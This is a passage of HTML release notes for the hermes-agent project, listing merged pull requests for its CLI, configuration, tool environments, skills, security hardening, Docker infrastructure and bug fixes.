<li>Gateway status scoped to active profile (<a href="https://github.com/NousResearch/hermes-agent/pull/7951" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7951/hovercard">#7951</a>)</li>
<li>Prevent background process notifications from triggering false pairing requests (<a href="https://github.com/NousResearch/hermes-agent/pull/6434" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6434/hovercard">#6434</a>)</li>
</ul>
<hr>
<h2>🖥️ CLI &amp; User Experience</h2>
<h3>Interactive CLI</h3>
<ul>
<li><strong>Termux / Android support</strong> — adapted install paths, TUI, voice, <code>/image</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/6834" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6834/hovercard">#6834</a>)</li>
<li><strong>Native <code>/model</code> picker modal</strong> for provider → model selection (<a href="https://github.com/NousResearch/hermes-agent/pull/8003" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8003/hovercard">#8003</a>)</li>
<li><strong>Live per-tool elapsed timer</strong> restored in TUI spinner (<a href="https://github.com/NousResearch/hermes-agent/pull/7359" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7359/hovercard">#7359</a>)</li>
<li><strong>Stacked tool progress scrollback</strong> in TUI (<a href="https://github.com/NousResearch/hermes-agent/pull/8201" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8201/hovercard">#8201</a>)</li>
<li><strong>Random tips on new session start</strong> (CLI + gateway, 279 tips) (<a href="https://github.com/NousResearch/hermes-agent/pull/8225" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8225/hovercard">#8225</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/8237" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8237/hovercard">#8237</a>)</li>
<li><strong><code>hermes dump</code></strong> — copy-pasteable setup summary for debugging (<a href="https://github.com/NousResearch/hermes-agent/pull/6550" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6550/hovercard">#6550</a>)</li>
<li><strong><code>hermes backup</code> / <code>hermes import</code></strong> — full config backup and restore (<a href="https://github.com/NousResearch/hermes-agent/pull/7997" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7997/hovercard">#7997</a>)</li>
<li><strong>WSL environment hint</strong> in system prompt (<a href="https://github.com/NousResearch/hermes-agent/pull/8285" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8285/hovercard">#8285</a>)</li>
<li><strong>Profile creation UX</strong> — seed SOUL.md + credential warning (<a href="https://github.com/NousResearch/hermes-agent/pull/8553" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8553/hovercard">#8553</a>)</li>
<li>Shell-aware sudo detection, empty password support (<a href="https://github.com/NousResearch/hermes-agent/pull/6517" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6517/hovercard">#6517</a>)</li>
<li>Flush stdin after curses/terminal menus to prevent escape sequence leakage (<a href="https://github.com/NousResearch/hermes-agent/pull/7167" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7167/hovercard">#7167</a>)</li>
<li>Handle broken stdin in prompt_toolkit startup (<a href="https://github.com/NousResearch/hermes-agent/pull/8560" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8560/hovercard">#8560</a>)</li>
</ul>
<h3>Setup &amp; Configuration</h3>
<ul>
<li><strong>Per-platform display verbosity</strong> configuration (<a href="https://github.com/NousResearch/hermes-agent/pull/8006" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8006/hovercard">#8006</a>)</li>
<li><strong>Component-separated logging</strong> with session context and filtering (<a href="https://github.com/NousResearch/hermes-agent/pull/7991" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7991/hovercard">#7991</a>)</li>
<li><strong><code>network.force_ipv4</code></strong> config to fix IPv6 timeout issues (<a href="https://github.com/NousResearch/hermes-agent/pull/8196" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8196/hovercard">#8196</a>)</li>
<li><strong>Standardize message whitespace and JSON formatting</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/7988" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7988/hovercard">#7988</a>)</li>
<li><strong>Rebrand OpenClaw → Hermes</strong> during migration (<a href="https://github.com/NousResearch/hermes-agent/pull/8210" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8210/hovercard">#8210</a>)</li>
<li>Config.yaml takes priority over env vars for auxiliary settings (<a href="https://github.com/NousResearch/hermes-agent/pull/7889" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7889/hovercard">#7889</a>)</li>
<li>Harden setup provider flows + live OpenRouter catalog refresh (<a href="https://github.com/NousResearch/hermes-agent/pull/7078" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7078/hovercard">#7078</a>)</li>
<li>Normalize reasoning effort ordering across all surfaces (<a href="https://github.com/NousResearch/hermes-agent/pull/6804" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6804/hovercard">#6804</a>)</li>
<li>Remove dead <code>LLM_MODEL</code> env var + migration to clear stale entries (<a href="https://github.com/NousResearch/hermes-agent/pull/6543" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6543/hovercard">#6543</a>)</li>
<li>Remove <code>/prompt</code> slash command — prefix expansion footgun (<a href="https://github.com/NousResearch/hermes-agent/pull/6752" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6752/hovercard">#6752</a>)</li>
<li><code>HERMES_HOME_MODE</code> env var to override permissions — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ygd58/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ygd58">@ygd58</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6993" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6993/hovercard">#6993</a>)</li>
<li>Fall back to default model when model config is empty (<a href="https://github.com/NousResearch/hermes-agent/pull/8303" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8303/hovercard">#8303</a>)</li>
<li>Warn when compression model context is too small (<a href="https://github.com/NousResearch/hermes-agent/pull/7894" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7894/hovercard">#7894</a>)</li>
</ul>
<hr>
<h2>🔧 Tool System</h2>
<h3>Environments &amp; Execution</h3>
<ul>
<li><strong>Unified spawn-per-call execution layer</strong> for environments (<a href="https://github.com/NousResearch/hermes-agent/pull/6343" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6343/hovercard">#6343</a>)</li>
<li><strong>Unified file sync</strong> with mtime tracking, deletion, and transactional state (<a href="https://github.com/NousResearch/hermes-agent/pull/7087" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7087/hovercard">#7087</a>)</li>
<li><strong>Persistent sandbox envs</strong> survive between turns (<a href="https://github.com/NousResearch/hermes-agent/pull/6412" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6412/hovercard">#6412</a>)</li>
<li><strong>Bulk file sync</strong> via tar pipe for SSH/Modal backends — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/8014" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8014/hovercard">#8014</a>)</li>
<li><strong>Daytona</strong> — bulk upload, config bridge, silent disk cap (<a href="https://github.com/NousResearch/hermes-agent/pull/7538" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7538/hovercard">#7538</a>)</li>
<li>Foreground timeout cap to prevent session deadlocks (<a href="https://github.com/NousResearch/hermes-agent/pull/7082" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7082/hovercard">#7082</a>)</li>
<li>Guard invalid command values (<a href="https://github.com/NousResearch/hermes-agent/pull/6417" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6417/hovercard">#6417</a>)</li>
</ul>
<h3>MCP</h3>
<ul>
<li><strong><code>hermes mcp add --env</code> and <code>--preset</code></strong> support (<a href="https://github.com/NousResearch/hermes-agent/pull/7970" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7970/hovercard">#7970</a>)</li>
<li>Combine <code>content</code> and <code>structuredContent</code> when both present (<a href="https://github.com/NousResearch/hermes-agent/pull/7118" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7118/hovercard">#7118</a>)</li>
<li>MCP tool name deconfliction fixes (<a href="https://github.com/NousResearch/hermes-agent/pull/7654" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7654/hovercard">#7654</a>)</li>
</ul>
<h3>Browser</h3>
<ul>
<li>Browser hardening — dead code removal, caching, scroll perf, security, thread safety (<a href="https://github.com/NousResearch/hermes-agent/pull/7354" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7354/hovercard">#7354</a>)</li>
<li><code>/browser connect</code> auto-launch uses dedicated Chrome profile dir (<a href="https://github.com/NousResearch/hermes-agent/pull/6821" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6821/hovercard">#6821</a>)</li>
<li>Reap orphaned browser sessions on startup (<a href="https://github.com/NousResearch/hermes-agent/pull/7931" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7931/hovercard">#7931</a>)</li>
</ul>
<h3>Voice &amp; Vision</h3>
<ul>
<li><strong>Voxtral TTS provider</strong> (Mistral AI) (<a href="https://github.com/NousResearch/hermes-agent/pull/7653" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7653/hovercard">#7653</a>)</li>
<li><strong>TTS speed support</strong> for Edge TTS, OpenAI TTS, MiniMax (<a href="https://github.com/NousResearch/hermes-agent/pull/8666" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8666/hovercard">#8666</a>)</li>
<li><strong>Vision auto-resize</strong> for oversized images, raise limit to 20 MB, retry-on-failure (<a href="https://github.com/NousResearch/hermes-agent/pull/7883" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7883/hovercard">#7883</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/7902" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7902/hovercard">#7902</a>)</li>
<li>STT provider-model mismatch fix (whisper-1 vs faster-whisper) (<a href="https://github.com/NousResearch/hermes-agent/pull/7113" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7113/hovercard">#7113</a>)</li>
</ul>
<h3>Other Tools</h3>
<ul>
<li><strong><code>hermes dump</code></strong> command for setup summary (<a href="https://github.com/NousResearch/hermes-agent/pull/6550" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6550/hovercard">#6550</a>)</li>
<li>TODO store enforces ID uniqueness during replace operations (<a href="https://github.com/NousResearch/hermes-agent/pull/7986" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7986/hovercard">#7986</a>)</li>
<li>List all available toolsets in <code>delegate_task</code> schema description (<a href="https://github.com/NousResearch/hermes-agent/pull/8231" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8231/hovercard">#8231</a>)</li>
<li>API server: tool progress as custom SSE event to prevent model corruption (<a href="https://github.com/NousResearch/hermes-agent/pull/7500" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7500/hovercard">#7500</a>)</li>
<li>API server: share one Docker container across all conversations (<a href="https://github.com/NousResearch/hermes-agent/pull/7127" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7127/hovercard">#7127</a>)</li>
</ul>
<hr>
<h2>🧩 Skills Ecosystem</h2>
<ul>
<li><strong>Centralized skills index + tree cache</strong> — eliminates rate-limit failures on install (<a href="https://github.com/NousResearch/hermes-agent/pull/8575" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8575/hovercard">#8575</a>)</li>
<li><strong>More aggressive skill loading instructions</strong> in system prompt (v3) (<a href="https://github.com/NousResearch/hermes-agent/pull/8209" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8209/hovercard">#8209</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/8286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8286/hovercard">#8286</a>)</li>
<li><strong>Google Workspace skill</strong> migrated to GWS CLI backend (<a href="https://github.com/NousResearch/hermes-agent/pull/6788" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6788/hovercard">#6788</a>)</li>
<li><strong>Creative divergence strategies</strong> skill — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6882" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6882/hovercard">#6882</a>)</li>
<li><strong>Creative ideation</strong> — constraint-driven project generation — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/7555" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7555/hovercard">#7555</a>)</li>
<li>Parallelize skills browse/search to prevent hanging (<a href="https://github.com/NousResearch/hermes-agent/pull/7301" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7301/hovercard">#7301</a>)</li>
<li>Read name from SKILL.md frontmatter in skills_sync (<a href="https://github.com/NousResearch/hermes-agent/pull/7623" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7623/hovercard">#7623</a>)</li>
</ul>
<hr>
<h2>🔒 Security &amp; Reliability</h2>
<h3>Security Hardening</h3>
<ul>
<li><strong>Twilio webhook signature validation</strong> — SMS RCE fix (<a href="https://github.com/NousResearch/hermes-agent/pull/7933" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7933/hovercard">#7933</a>)</li>
<li><strong>Shell injection neutralization</strong> in <code>_write_to_sandbox</code> via path quoting (<a href="https://github.com/NousResearch/hermes-agent/pull/7940" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7940/hovercard">#7940</a>)</li>
<li><strong>Git argument injection</strong> and path traversal prevention in checkpoint manager (<a href="https://github.com/NousResearch/hermes-agent/pull/7944" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7944/hovercard">#7944</a>)</li>
<li><strong>SSRF redirect bypass</strong> in Slack image uploads + base.py cache helpers (<a href="https://github.com/NousResearch/hermes-agent/pull/7151" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7151/hovercard">#7151</a>)</li>
<li><strong>Path traversal, credential gate, DANGEROUS_PATTERNS gaps</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/7156" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7156/hovercard">#7156</a>)</li>
<li><strong>API bind guard</strong> — enforce <code>API_SERVER_KEY</code> for non-loopback binding (<a href="https://github.com/NousResearch/hermes-agent/pull/7455" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7455/hovercard">#7455</a>)</li>
<li><strong>Approval button authorization</strong> — require auth for session continuation — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Cafexss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Cafexss">@Cafexss</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6930" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6930/hovercard">#6930</a>)</li>
<li>Path boundary enforcement in skill manager operations (<a href="https://github.com/NousResearch/hermes-agent/pull/7156" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7156/hovercard">#7156</a>)</li>
<li>DingTalk/API webhook URL origin validation, header injection rejection (<a href="https://github.com/NousResearch/hermes-agent/pull/7455" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7455/hovercard">#7455</a>)</li>
</ul>
<h3>Reliability</h3>
<ul>
<li><strong>Contextual error diagnostics</strong> for invalid API responses (<a href="https://github.com/NousResearch/hermes-agent/pull/8565" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8565/hovercard">#8565</a>)</li>
<li><strong>Prevent 400 format errors</strong> from triggering compression loop on Codex (<a href="https://github.com/NousResearch/hermes-agent/pull/6751" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6751/hovercard">#6751</a>)</li>
<li><strong>Don't halve context_length</strong> on output-cap-too-large errors — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KUSH42/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KUSH42">@KUSH42</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6664" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6664/hovercard">#6664</a>)</li>
<li><strong>Recover primary client</strong> on OpenAI transport errors (<a href="https://github.com/NousResearch/hermes-agent/pull/7108" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7108/hovercard">#7108</a>)</li>
<li><strong>Credential pool rotation</strong> on billing-classified 400s (<a href="https://github.com/NousResearch/hermes-agent/pull/7112" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7112/hovercard">#7112</a>)</li>
<li><strong>Auto-increase stream read timeout</strong> for local LLM providers (<a href="https://github.com/NousResearch/hermes-agent/pull/6967" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6967/hovercard">#6967</a>)</li>
<li><strong>Fall back to default certs</strong> when CA bundle path doesn't exist (<a href="https://github.com/NousResearch/hermes-agent/pull/7352" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7352/hovercard">#7352</a>)</li>
<li><strong>Disambiguate usage-limit patterns</strong> in error classifier — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sprmn24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sprmn24">@sprmn24</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6836" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6836/hovercard">#6836</a>)</li>
<li>Harden cron script timeout and provider recovery (<a href="https://github.com/NousResearch/hermes-agent/pull/7079" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7079/hovercard">#7079</a>)</li>
<li>Gateway interrupt detection resilient to monitor task failures (<a href="https://github.com/NousResearch/hermes-agent/pull/8208" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8208/hovercard">#8208</a>)</li>
<li>Prevent unwanted session auto-reset after graceful gateway restarts (<a href="https://github.com/NousResearch/hermes-agent/pull/8299" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8299/hovercard">#8299</a>)</li>
<li>Prevent duplicate update prompt spam in gateway watcher (<a href="https://github.com/NousResearch/hermes-agent/pull/8343" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8343/hovercard">#8343</a>)</li>
<li>Deduplicate reasoning items in Responses API input (<a href="https://github.com/NousResearch/hermes-agent/pull/7946" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7946/hovercard">#7946</a>)</li>
</ul>
<h3>Infrastructure</h3>
<ul>
<li><strong>Multi-arch Docker image</strong> — amd64 + arm64 (<a href="https://github.com/NousResearch/hermes-agent/pull/6124" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6124/hovercard">#6124</a>)</li>
<li><strong>Docker runs as non-root user</strong> with virtualenv — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a> contributing (<a href="https://github.com/NousResearch/hermes-agent/pull/8226" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8226/hovercard">#8226</a>)</li>
<li><strong>Use <code>uv</code></strong> for Docker dependency resolution to fix resolution-too-deep (<a href="https://github.com/NousResearch/hermes-agent/pull/6965" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6965/hovercard">#6965</a>)</li>
<li><strong>Container-aware Nix CLI</strong> — auto-route into managed container — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/7543" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7543/hovercard">#7543</a>)</li>
<li><strong>Nix shared-state permission model</strong> for interactive CLI users — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6796" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6796/hovercard">#6796</a>)</li>
<li><strong>Per-profile subprocess HOME isolation</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/7357" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7357/hovercard">#7357</a>)</li>
<li>Profile paths fixed in Docker — profiles go to mounted volume (<a href="https://github.com/NousResearch/hermes-agent/pull/7170" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7170/hovercard">#7170</a>)</li>
<li>Docker container gateway pathway hardened (<a href="https://github.com/NousResearch/hermes-agent/pull/8614" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8614/hovercard">#8614</a>)</li>
<li>Enable unbuffered stdout for live Docker logs (<a href="https://github.com/NousResearch/hermes-agent/pull/6749" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6749/hovercard">#6749</a>)</li>
<li>Install procps in Docker image — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HiddenPuppy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HiddenPuppy">@HiddenPuppy</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/7032" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7032/hovercard">#7032</a>)</li>
<li>Shallow git clone for faster installation — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sosyz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sosyz">@sosyz</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/8396" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8396/hovercard">#8396</a>)</li>
<li><code>hermes update</code> always reset on stash conflict (<a href="https://github.com/NousResearch/hermes-agent/pull/7010" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7010/hovercard">#7010</a>)</li>
<li>Write update exit code before gateway restart (cgroup kill race) (<a href="https://github.com/NousResearch/hermes-agent/pull/8288" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8288/hovercard">#8288</a>)</li>
<li>Nix: <code>setupSecrets</code> optional, tirith runtime dep — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devorun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devorun">@devorun</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6261" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6261/hovercard">#6261</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/6721" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6721/hovercard">#6721</a>)</li>
<li>launchd stop uses <code>bootout</code> so <code>KeepAlive</code> doesn't respawn (<a href="https://github.com/NousResearch/hermes-agent/pull/7119" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7119/hovercard">#7119</a>)</li>
</ul>
<hr>
<h2>🐛 Notable Bug Fixes</h2>
<ul>
<li>Fix: <code>/model</code> switch not persisting across gateway messages (<a href="https://github.com/NousResearch/hermes-agent/pull/7081" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7081/hovercard">#7081</a>)</li>
<li>Fix: session-scoped gateway model overrides ignored — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hygaard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hygaard">@Hygaard</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/7662" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7662/hovercard">#7662</a>)</li>
<li>Fix: compaction model context length ignoring config — 3 related issues (<a href="https://github.com/NousResearch/hermes-agent/pull/8258" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8258/hovercard">#8258</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/8107" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8107/hovercard">#8107</a>)</li>
<li>Fix: OpenCode.ai context window resolved to 128K instead of 1M (<a href="https://github.com/NousResearch/hermes-agent/pull/6472" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6472/hovercard">#6472</a>)</li>
<li>Fix: Codex fallback auth-store lookup — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cherifya/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cherifya">@cherifya</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6462" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6462/hovercard">#6462</a>)</li>
<li>Fix: duplicate completion notifications when process killed (<a href="https://github.com/NousResearch/hermes-agent/pull/7124" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7124/hovercard">#7124</a>)</li>
<li>Fix: agent daemon thread prevents orphan CLI processes on tab close (<a href="https://github.com/NousResearch/hermes-agent/pull/8557" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8557/hovercard">#8557</a>)</li>
<li>Fix: stale image attachment on text paste and voice input (<a href="https://github.com/NousResearch/hermes-agent/pull/7077" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7077/hovercard">#7077</a>)</li>
<li>Fix: DM thread session seeding causing cross-thread contamination (<a href="https://github.com/NousResearch/hermes-agent/pull/7084" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7084/hovercard">#7084</a>)</li>
<li>Fix: OpenClaw migration shows dry-run preview before executing (<a href="https://github.com/NousResearch/hermes-agent/pull/6769" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6769/hovercard">#6769</a>)</li>
<li>Fix: auth errors misclassified as retryable — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kuishou68/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kuishou68">@kuishou68</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/7027" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7027/hovercard">#7027</a>)</li>
<li>Fix: Copilot-Integration-Id header missing (<a href="https://github.com/NousResearch/hermes-agent/pull/7083" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7083/hovercard">#7083</a>)</li>
<li>Fix: ACP session capabilities — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6985" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6985/hovercard">#6985</a>)</li>
